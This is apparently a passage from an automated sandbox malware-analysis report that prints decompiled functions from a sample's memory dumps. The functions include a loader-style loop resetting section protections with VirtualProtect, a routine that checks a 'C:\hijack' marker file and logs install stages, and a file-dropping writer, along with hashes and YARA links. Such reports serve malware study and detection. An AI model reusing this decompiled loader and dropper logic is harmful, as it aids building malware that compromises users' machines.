                                                                                                                                                    • Associated: 00000004.00000002.627086120.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.627109881.0000000000498000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: ZO@
                                                                                                                                                    • API String ID: 0-2673303598
                                                                                                                                                    • Opcode ID: 3fa2c055748bf9abe8dc77b52f31c7ecafde4fc0a5cc0f9542dfa4211cee63af
                                                                                                                                                    • Instruction ID: cc4db67861bc35064f04e76d0d8c2e0758453c5fb9c885ea1514584d6887f972
                                                                                                                                                    • Opcode Fuzzy Hash: 3fa2c055748bf9abe8dc77b52f31c7ecafde4fc0a5cc0f9542dfa4211cee63af
                                                                                                                                                    • Instruction Fuzzy Hash: C961C9B5E00209EFDB04DF94C885BAFBBB5FB48314F108159EA05AB381D774A941CFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00405486, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                                    			E00405486(intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				long _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				long _v68;
				intOrPtr* _t73;
				void* _t135;

				_v40 = 1;
				_v36 = 8;
				_v32 = 2;
				_v28 = 4;
				_v24 = 0x10;
				_v20 = 0x80;
				_v16 = 0x20;
				_v12 = 0x40;
				_v44 =  *_a4 + ( *( *_a4 + 0x14) & 0x0000ffff) + 0x18;
				_v8 = 0;
				while(1) {
					_t73 = _a4;
					if(_v8 >= ( *( *_t73 + 6) & 0x0000ffff)) {
						break;
					}
					asm("sbb ecx, ecx");
					_v56 =  ~( ~( *(_v44 + 0x24) & 0x20000000));
					asm("sbb eax, eax");
					_v64 =  ~( ~( *(_v44 + 0x24) & 0x40000000));
					asm("sbb edx, edx");
					_v52 =  ~( ~( *(_v44 + 0x24) & 0x80000000));
					if(( *(_v44 + 0x24) & 0x02000000) == 0) {
						_v60 =  *((intOrPtr*)(_t135 + (_v56 << 4) - 0x24 + _v64 * 8 + _v52 * 4));
						if(( *(_v44 + 0x24) & 0x04000000) != 0) {
							_v60 = _v60 | 0x00000200;
						}
						_v68 =  *((intOrPtr*)(_v44 + 0x10));
						if(_v68 == 0) {
							if(( *(_v44 + 0x24) & 0x00000040) == 0) {
								if(( *(_v44 + 0x24) & 0x00000080) != 0) {
									_v68 =  *((intOrPtr*)( *_a4 + 0x24));
								}
							} else {
								_v68 =  *((intOrPtr*)( *_a4 + 0x20));
							}
						}
						if(_v68 > 0) {
							VirtualProtect( *(_v44 + 8), _v68, _v60,  &_v48); // executed
						}
					}
					_v8 = _v8 + 1;
					_v44 = _v44 + 0x28;
				}
				return _t73;
			}





















                                                                                                                                                    0x0040548c
                                                                                                                                                    0x00405493
                                                                                                                                                    0x0040549a
                                                                                                                                                    0x004054a1
                                                                                                                                                    0x004054a8
                                                                                                                                                    0x004054af
                                                                                                                                                    0x004054b6
                                                                                                                                                    0x004054bd
                                                                                                                                                    0x004054d6
                                                                                                                                                    0x004054d9
                                                                                                                                                    0x004054f4
                                                                                                                                                    0x004054f4
                                                                                                                                                    0x00405500
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405514
                                                                                                                                                    0x00405518
                                                                                                                                                    0x00405528
                                                                                                                                                    0x0040552c
                                                                                                                                                    0x0040553d
                                                                                                                                                    0x00405541
                                                                                                                                                    0x00405550
                                                                                                                                                    0x0040556a
                                                                                                                                                    0x00405578
                                                                                                                                                    0x00405583
                                                                                                                                                    0x00405583
                                                                                                                                                    0x0040558c
                                                                                                                                                    0x00405593
                                                                                                                                                    0x0040559e
                                                                                                                                                    0x004055b9
                                                                                                                                                    0x004055c3
                                                                                                                                                    0x004055c3
                                                                                                                                                    0x004055a0
                                                                                                                                                    0x004055a8
                                                                                                                                                    0x004055a8
                                                                                                                                                    0x0040559e
                                                                                                                                                    0x004055ca
                                                                                                                                                    0x004055e5
                                                                                                                                                    0x004055e5
                                                                                                                                                    0x004055e7
                                                                                                                                                    0x004054e8
                                                                                                                                                    0x004054f1
                                                                                                                                                    0x004054f1
                                                                                                                                                    0x004055ef

                                                                                                                                                    APIs
                                                                                                                                                    • VirtualProtect.KERNELBASE(00000000,00000000,?,?), ref: 004055E5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.627045125.0000000000404000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000004.00000002.627003150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.627030438.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.627057789.0000000000406000.00000080.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.627075353.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.627086120.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.627109881.0000000000498000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                    • String ID: $@
                                                                                                                                                    • API String ID: 544645111-1077428164
                                                                                                                                                    • Opcode ID: f624bd3e15cca0fcb456706e8e4389966f128c157dc993db58a64aaca4871b9e
                                                                                                                                                    • Instruction ID: 4adaff3e66f413f93adf127a04c7bad7dd9384423d34ea245ea5da509650356b
                                                                                                                                                    • Opcode Fuzzy Hash: f624bd3e15cca0fcb456706e8e4389966f128c157dc993db58a64aaca4871b9e
                                                                                                                                                    • Instruction Fuzzy Hash: 3251E574A00619DFDB08CF88C590BEEBBF2FB88314F249259E405AB395D735A985CF94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 10020385, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                    			E10020385(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t19;
				intOrPtr _t30;
				void* _t32;
				void* _t34;
				void* _t46;
				void* _t48;
				intOrPtr _t49;
				void* _t50;
				intOrPtr _t51;
				intOrPtr _t53;
				intOrPtr _t55;

				_t44 = __esi;
				_t43 = __edi;
				_t35 = __ebx;
				E1001FDB0(); // executed
				_t49 = _t48 - 0x1c;
				_t36 = _t49;
				 *((intOrPtr*)(_t46 - 0x248)) = _t49;
				 *((intOrPtr*)(_t46 - 0x260)) = E10001160(_t49, __eflags, "status=main_start");
				E1001FF90(__ebx, __edi, __esi, __eflags); // executed
				_t50 = _t49 + 0x1c;
				_t19 = PathFileExistsA("C:\\hijack"); // executed
				if(_t19 != 0) {
					L7:
					_t51 = _t50 - 0x1c;
					 *((intOrPtr*)(_t46 - 0x24c)) = _t51;
					 *((intOrPtr*)(_t46 - 0x264)) = E10001160(_t51, __eflags, "status=check_debug");
					E1001FF90(_t35, _t43, _t44, __eflags); // executed
					_t53 = _t51 + 0x1c - 0x1c;
					 *((intOrPtr*)(_t46 - 0x250)) = _t53;
					 *((intOrPtr*)(_t46 - 0x268)) = E10001160(_t53, __eflags, "installp3");
					E1001FEA0(_t35, _t43, _t44, __eflags); // executed
					_t55 = _t53 + 0x1c - 0x1c;
					 *((intOrPtr*)(_t46 - 0x254)) = _t55;
					 *((intOrPtr*)(_t46 - 0x26c)) = E10001160(_t55, __eflags, "installp3");
					E1001FDC0(_t35, _t43, _t44, __eflags); // executed
					 *((intOrPtr*)(_t46 - 0x258)) = _t55 + 0x1c - 0x1c;
					 *((intOrPtr*)(_t46 - 0x270)) = E10001160(_t55 + 0x1c - 0x1c, __eflags, "status=main_over");
					E1001FF90(_t35, _t43, _t44, __eflags); // executed
				} else {
					E1001A0A0(); // executed
					_t32 = E1001A0B0(_t36); // executed
					if(_t32 == 0 || E10019D10() != 0) {
					} else {
						_t34 = E1001FA30(__ebx, __edi, __esi, __eflags, 0x3e8, 0); // executed
						_t50 = _t50 + 8;
						__eflags = _t34;
						if(__eflags != 0) {
							goto L7;
						} else {
						}
					}
				}
				E1001A260(); // executed
				 *((intOrPtr*)(_t46 - 0x25c)) = 1;
				 *((intOrPtr*)(_t46 - 4)) = 0xffffffff;
				E100011A0(_t46 - 0x28);
				_t30 =  *((intOrPtr*)(_t46 - 0x25c));
				 *[fs:0x0] =  *((intOrPtr*)(_t46 - 0xc));
				return _t30;
			}














                                                                                                                                                    0x10020385
                                                                                                                                                    0x10020385
                                                                                                                                                    0x10020385
                                                                                                                                                    0x10020454
                                                                                                                                                    0x10020459
                                                                                                                                                    0x1002045c
                                                                                                                                                    0x1002045e
                                                                                                                                                    0x1002046e
                                                                                                                                                    0x10020474
                                                                                                                                                    0x10020479
                                                                                                                                                    0x10020481
                                                                                                                                                    0x10020489
                                                                                                                                                    0x100204bf
                                                                                                                                                    0x100204bf
                                                                                                                                                    0x100204c4
                                                                                                                                                    0x100204d4
                                                                                                                                                    0x100204da
                                                                                                                                                    0x100204e2
                                                                                                                                                    0x100204e7
                                                                                                                                                    0x100204f7
                                                                                                                                                    0x100204fd
                                                                                                                                                    0x10020505
                                                                                                                                                    0x1002050a
                                                                                                                                                    0x1002051a
                                                                                                                                                    0x10020520
                                                                                                                                                    0x1002052d
                                                                                                                                                    0x1002053d
                                                                                                                                                    0x10020543
                                                                                                                                                    0x1002048b
                                                                                                                                                    0x1002048b
                                                                                                                                                    0x10020490
                                                                                                                                                    0x10020497
                                                                                                                                                    0x100204a7
                                                                                                                                                    0x100204ae
                                                                                                                                                    0x100204b3
                                                                                                                                                    0x100204b6
                                                                                                                                                    0x100204b8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x100204ba
                                                                                                                                                    0x100204b8
                                                                                                                                                    0x10020497
                                                                                                                                                    0x1002054b
                                                                                                                                                    0x10020550
                                                                                                                                                    0x1002055a
                                                                                                                                                    0x10020564
                                                                                                                                                    0x10020569
                                                                                                                                                    0x10020572
                                                                                                                                                    0x1002057d

                                                                                                                                                    APIs
                                                                                                                                                    • PathFileExistsA.KERNELBASE(C:\hijack), ref: 10020481
                                                                                                                                                      • Part of subcall function 10019D10: GetSystemDefaultLCID.KERNEL32 ref: 10019D1D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.645019852.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                    • Associated: 00000004.00000002.645009330.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.645045809.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646312035.0000000010333000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646339843.0000000010338000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646354560.0000000010339000.00000004.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DefaultExistsFilePathSystem
                                                                                                                                                    • String ID: C:\hijack$status=main_start
                                                                                                                                                    • API String ID: 482051434-250544710
                                                                                                                                                    • Opcode ID: f24dd853a3f2647e0f54d7866651a87a001b20664300df6d35c9f632d5168c38
                                                                                                                                                    • Instruction ID: df4226edb40a7b5d91d041820debc58893bf8ac01c42a8e6d1f828ee5ffc2999
                                                                                                                                                    • Opcode Fuzzy Hash: f24dd853a3f2647e0f54d7866651a87a001b20664300df6d35c9f632d5168c38
                                                                                                                                                    • Instruction Fuzzy Hash: 62F0C279D043188BDB14FFB4DC463DD77B1DF042A0F904199FD085A243EB32A9809A62
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1000CE64, Relevance: 4.6, APIs: 3, Instructions: 66memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 73%
                                                                                                                                                    			E1000CE64(void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t1;
				void* _t2;
				void* _t6;
				void* _t10;
				void* _t12;
				void* _t18;
				void* _t20;
				void* _t22;
				intOrPtr _t24;
				void* _t28;
				void* _t30;
				void* _t32;

				_t18 = __edx;
				_t12 = HeapAlloc;
				do {
					_t32 =  *0x10334310; // 0x4bd0000
					_t20 = _t30;
					if(_t32 == 0) {
						E100119E6(_t12, _t18, _t20, _t32);
						E10011846(0x1e);
						E100115A8(0xff);
					}
					_t1 =  *0x10336f3c;
					if(_t1 != 1) {
						__eflags = _t1 - 3;
						if(__eflags != 0) {
							L10:
							__eflags = _t30;
							if(_t30 == 0) {
								_t20 = 1;
								__eflags = 1;
							}
							_t22 = _t20 + 0x0000000f & 0xfffffff0;
							__eflags = _t22;
							_push(_t22);
							goto L13;
						} else {
							_push(_t30);
							_t2 = E1000CE07(_t12, _t20, 0, __eflags);
							__eflags = _t2;
							if(__eflags == 0) {
								goto L10;
							}
						}
					} else {
						if(_t30 == 0) {
							_t10 = 1;
							__eflags = 1;
						} else {
							_t10 = _t30;
						}
						_push(_t10);
						L13:
						_push(0);
						_t2 = RtlAllocateHeap( *0x10334310); // executed
					}
					_t28 = _t2;
					if(_t28 == 0) {
						_t24 = 0xc;
						if( *0x103347d4 == _t2) {
							 *((intOrPtr*)(E1000F720(__eflags))) = _t24;
							L19:
							 *((intOrPtr*)(E1000F720(_t37))) = _t24;
						} else {
							goto L16;
						}
					}
					return _t28;
					L16:
					_t6 = E100108CA(_t30);
					_t37 = _t6;
				} while (_t6 != 0);
				goto L19;
			}


















                                                                                                                                                    0x1000ce64
                                                                                                                                                    0x1000ce65
                                                                                                                                                    0x1000ce6d
                                                                                                                                                    0x1000ce6f
                                                                                                                                                    0x1000ce75
                                                                                                                                                    0x1000ce77
                                                                                                                                                    0x1000ce79
                                                                                                                                                    0x1000ce80
                                                                                                                                                    0x1000ce8a
                                                                                                                                                    0x1000ce90
                                                                                                                                                    0x1000ce91
                                                                                                                                                    0x1000ce99
                                                                                                                                                    0x1000cea9
                                                                                                                                                    0x1000ceac
                                                                                                                                                    0x1000ceb9
                                                                                                                                                    0x1000ceb9
                                                                                                                                                    0x1000cebb
                                                                                                                                                    0x1000cebf
                                                                                                                                                    0x1000cebf
                                                                                                                                                    0x1000cebf
                                                                                                                                                    0x1000cec3
                                                                                                                                                    0x1000cec3
                                                                                                                                                    0x1000cec6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1000ceae
                                                                                                                                                    0x1000ceae
                                                                                                                                                    0x1000ceaf
                                                                                                                                                    0x1000ceb4
                                                                                                                                                    0x1000ceb7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1000ceb7
                                                                                                                                                    0x1000ce9b
                                                                                                                                                    0x1000ce9d
                                                                                                                                                    0x1000cea5
                                                                                                                                                    0x1000cea5
                                                                                                                                                    0x1000ce9f
                                                                                                                                                    0x1000ce9f
                                                                                                                                                    0x1000ce9f
                                                                                                                                                    0x1000cea6
                                                                                                                                                    0x1000cec7
                                                                                                                                                    0x1000cec7
                                                                                                                                                    0x1000cece
                                                                                                                                                    0x1000cece
                                                                                                                                                    0x1000ced0
                                                                                                                                                    0x1000ced4
                                                                                                                                                    0x1000cede
                                                                                                                                                    0x1000cedf
                                                                                                                                                    0x1000cef3
                                                                                                                                                    0x1000cef5
                                                                                                                                                    0x1000cefa
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1000cedf
                                                                                                                                                    0x1000cf02
                                                                                                                                                    0x1000cee1
                                                                                                                                                    0x1000cee2
                                                                                                                                                    0x1000cee7
                                                                                                                                                    0x1000cee9
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • __FF_MSGBANNER.LIBCMT ref: 1000CE79
                                                                                                                                                      • Part of subcall function 100119E6: __NMSG_WRITE.LIBCMT ref: 10011A0D
                                                                                                                                                      • Part of subcall function 100119E6: __NMSG_WRITE.LIBCMT ref: 10011A17
                                                                                                                                                    • __NMSG_WRITE.LIBCMT ref: 1000CE80
                                                                                                                                                      • Part of subcall function 10011846: _strcpy_s.LIBCMT ref: 100118B2
                                                                                                                                                      • Part of subcall function 10011846: __invoke_watson.LIBCMT ref: 100118C3
                                                                                                                                                      • Part of subcall function 10011846: GetModuleFileNameA.KERNEL32(00000000,103344D9,00000104,?,103342E0,00000000), ref: 100118DF
                                                                                                                                                      • Part of subcall function 10011846: _strcpy_s.LIBCMT ref: 100118F4
                                                                                                                                                      • Part of subcall function 10011846: __invoke_watson.LIBCMT ref: 10011907
                                                                                                                                                      • Part of subcall function 10011846: _strlen.LIBCMT ref: 10011910
                                                                                                                                                      • Part of subcall function 10011846: _strlen.LIBCMT ref: 1001191D
                                                                                                                                                      • Part of subcall function 10011846: __invoke_watson.LIBCMT ref: 1001194A
                                                                                                                                                      • Part of subcall function 100115A8: ___crtCorExitProcess.LIBCMT ref: 100115AC
                                                                                                                                                      • Part of subcall function 100115A8: ExitProcess.KERNEL32 ref: 100115B6
                                                                                                                                                      • Part of subcall function 1000CE07: ___sbh_alloc_block.LIBCMT ref: 1000CE2F
                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 1000CECE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.645019852.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                    • Associated: 00000004.00000002.645009330.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.645045809.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646312035.0000000010333000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646339843.0000000010338000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646354560.0000000010339000.00000004.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __invoke_watson$ExitProcess_strcpy_s_strlen$AllocateFileHeapModuleName___crt___sbh_alloc_block
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3791426274-0
                                                                                                                                                    • Opcode ID: 1d26f4c0a47d70d85f70874aac04e47302412513a94a6691fc015567308a0800
                                                                                                                                                    • Instruction ID: 1de0190738f590b0933ba0aa462bcd0764e1a2b5cfad3cbe6a4fad74f982277f
                                                                                                                                                    • Opcode Fuzzy Hash: 1d26f4c0a47d70d85f70874aac04e47302412513a94a6691fc015567308a0800
                                                                                                                                                    • Instruction Fuzzy Hash: 77012B3A6453ED5AF220D764ECC1D2E629DDBC16F0B210126F904CB59ACB20AC4142E1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1001FC10, Relevance: 4.5, APIs: 3, Instructions: 34fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E1001FC10(CHAR* _a4, void* _a8, long _a12) {
				void* _v8;
				long _v12;
				struct _OVERLAPPED* _v16;
				void* _t12;
				int _t14;

				_v16 = 0;
				_t12 = CreateFileA(_a4, 0x40000000, 0, 0, 2, 0x80, 0); // executed
				_v8 = _t12;
				_t14 = WriteFile(_v8, _a8, _a12,  &_v12, 0); // executed
				if(_t14 != 0) {
					_v16 = 1;
				}
				CloseHandle(_v8);
				return _v16;
			}








                                                                                                                                                    0x1001fc16
                                                                                                                                                    0x1001fc33
                                                                                                                                                    0x1001fc39
                                                                                                                                                    0x1001fc4e
                                                                                                                                                    0x1001fc56
                                                                                                                                                    0x1001fc58
                                                                                                                                                    0x1001fc58
                                                                                                                                                    0x1001fc63
                                                                                                                                                    0x1001fc6f

                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileA.KERNELBASE(100268A0,40000000,00000000,00000000,00000002,00000080,00000000), ref: 1001FC33
                                                                                                                                                    • WriteFile.KERNELBASE(00039E00,00000000,00000000,100268A0,00000000), ref: 1001FC4E
                                                                                                                                                    • CloseHandle.KERNEL32(00039E00), ref: 1001FC63
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.645019852.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                    • Associated: 00000004.00000002.645009330.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.645045809.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646312035.0000000010333000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646339843.0000000010338000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646354560.0000000010339000.00000004.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$CloseCreateHandleWrite
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1065093856-0
                                                                                                                                                    • Opcode ID: 58dcd373d95f935da9dab33e0afd965a40fce0c80e25616e4d47ed3d20d7db64
                                                                                                                                                    • Instruction ID: 8035e793fd9196c22525ec6c46e761f67ba1426afb40fad35566dc0bfd35744e
                                                                                                                                                    • Opcode Fuzzy Hash: 58dcd373d95f935da9dab33e0afd965a40fce0c80e25616e4d47ed3d20d7db64
                                                                                                                                                    • Instruction Fuzzy Hash: A3F0BD75B40208BBEB14DFD4DD95F9EB7B8EB48700F20C148FA18AB280D675AA059B64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1001F1C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 6COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E1001F1C0() {
				int _t1;

				_t1 = PathFileExistsA("C:\\hijack"); // executed
				return _t1;
			}




                                                                                                                                                    0x1001f1c8
                                                                                                                                                    0x1001f1cf

                                                                                                                                                    APIs
                                                                                                                                                    • PathFileExistsA.KERNELBASE(C:\hijack,?,1001F1E2,?,10022649,[HIJACK][%s][%s][%d]: data = %s,00000000), ref: 1001F1C8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.645019852.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                    • Associated: 00000004.00000002.645009330.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.645045809.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646312035.0000000010333000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646339843.0000000010338000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646354560.0000000010339000.00000004.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExistsFilePath
                                                                                                                                                    • String ID: C:\hijack
                                                                                                                                                    • API String ID: 1174141254-148195797
                                                                                                                                                    • Opcode ID: 14122fe3a97c240cae0ebc801744e2228d29e9584bc9b60296d3da73ca953798
                                                                                                                                                    • Instruction ID: cbcd4ec5042ff81f7f552497cc273b56006d66024910556231888f1c34088e01
                                                                                                                                                    • Opcode Fuzzy Hash: 14122fe3a97c240cae0ebc801744e2228d29e9584bc9b60296d3da73ca953798
                                                                                                                                                    • Instruction Fuzzy Hash: 71A022300C020CB3800023CABC0C8E0BB0CC8888333800000FA0E000008B23202000AA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1001F1D0, Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E1001F1D0(void* __edi, intOrPtr _a4, char _a8) {
				char* _v8;
				char _v70491;
				char _v70492;
				void* _t12;
				void* _t16;

				E10018AA0(0x11358); // executed
				_t12 = E1001F1C0(); // executed
				if(_t12 != 0) {
					_v70492 = 0;
					E1000CF20(__edi,  &_v70491, 0, 0x1134f);
					_v8 =  &_a8;
					_t16 = E10001C30( &_v70492, 0x1134f, _a4, _v8);
					_v8 = 0;
					OutputDebugStringA( &_v70492);
					return _t16;
				}
				return _t12;
			}








                                                                                                                                                    0x1001f1d8
                                                                                                                                                    0x1001f1dd
                                                                                                                                                    0x1001f1e4
                                                                                                                                                    0x1001f1e6
                                                                                                                                                    0x1001f1fb
                                                                                                                                                    0x1001f206
                                                                                                                                                    0x1001f21d
                                                                                                                                                    0x1001f225
                                                                                                                                                    0x1001f233
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1001f233
                                                                                                                                                    0x1001f23c

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 1001F1C0: PathFileExistsA.KERNELBASE(C:\hijack,?,1001F1E2,?,10022649,[HIJACK][%s][%s][%d]: data = %s,00000000), ref: 1001F1C8
                                                                                                                                                    • _memset.LIBCMT ref: 1001F1FB
                                                                                                                                                      • Part of subcall function 10001C30: __vsnprintf_s.LIBCMT ref: 10001C47
                                                                                                                                                    • OutputDebugStringA.KERNEL32(?,?,?,?,?,10022649,[HIJACK][%s][%s][%d]: data = %s), ref: 1001F233
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.645019852.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                    • Associated: 00000004.00000002.645009330.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.645045809.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646312035.0000000010333000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646339843.0000000010338000.00000002.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.646354560.0000000010339000.00000004.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DebugExistsFileOutputPathString__vsnprintf_s_memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3726070730-0
                                                                                                                                                    • Opcode ID: 2fb87418e3b44a36b82fd4fbcf3289405523f4fabf60574076265314f3352978
                                                                                                                                                    • Instruction ID: 5fae8ccb18960f20e4858b4614e50bfe67379fcea69274a5c0d335edaae865dd
                                                                                                                                                    • Opcode Fuzzy Hash: 2fb87418e3b44a36b82fd4fbcf3289405523f4fabf60574076265314f3352978
                                                                                                                                                    • Instruction Fuzzy Hash: 23F09079900348A7DB08CBE5DC46FE9B37EDB04A00F5440C8FA1897649EA70F7848BA2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1000F7BF, Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E1000F7BF(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t7;
				void* _t10;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x10334310 = _t6;
				if(_t6 != 0) {
					_t7 = E1000F764(__eflags);
					__eflags = _t7 - 3;
					 *0x10336f3c = _t7;
					if(_t7 != 3) {
						L5:
						__eflags = 1;
						return 1;
					} else {
						_t10 = E1000FA34(0x3f8);
						__eflags = _t10;
						if(_t10 != 0) {
							goto L5;
						} else {
							HeapDestroy( *0x10334310);
							 *0x10334310 =  *0x10334310 & 0x00000000;
							goto L1;
						}
					}
				} else {
					L1:
					return 0;
				}
			}






                                                                                                                                                    0x1000f7d0
                                                                                                                                                    0x1000f7d8
                                                                                                                                                    0x1000f7dd
                                                                                                                                                    0x1000f7e2
                                                                                                                                                    0x1000f7e7
                                                                                                                                                    0x1000f7ea
                                                                                                                                                    0x1000f7ef
                                                                                                                                                    0x1000f815
                                                                                                                                                    0x1000f817
                                                                                                                                                    0x1000f818
                                                                                                                                                    0x1000f7f1
                                                                                                                                                    0x1000f7f6
                                                                                                                                                    0x1000f7fb
                                                                                                                                                    0x1000f7fe
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1000f800
                                                                                                                                                    0x1000f806
                                                                                                                                                    0x1000f80c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x1000f80c
                                                                                                                                                    0x1000f7fe
                                                                                                                                                    0x1000f7df
                                                                                                                                                    0x1000f7df
                                                                                                                                                    0x1000f7e1
                                                                                                                                                    0x1000f7e1

                                                                                                                                                    APIs
                                                                                                                                                    • HeapCreate.KERNELBASE(00000000,00001000,00000000,1000E9AF,00000001), ref: 1000F7D0
                                                                                                                                                    • HeapDestroy.KERNEL32 ref: 1000F806
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.645019852.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                    • Associated: 00000004.00000002.645009330.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.645045809.0000000010023000.00000002.00000001.sdmp Download File
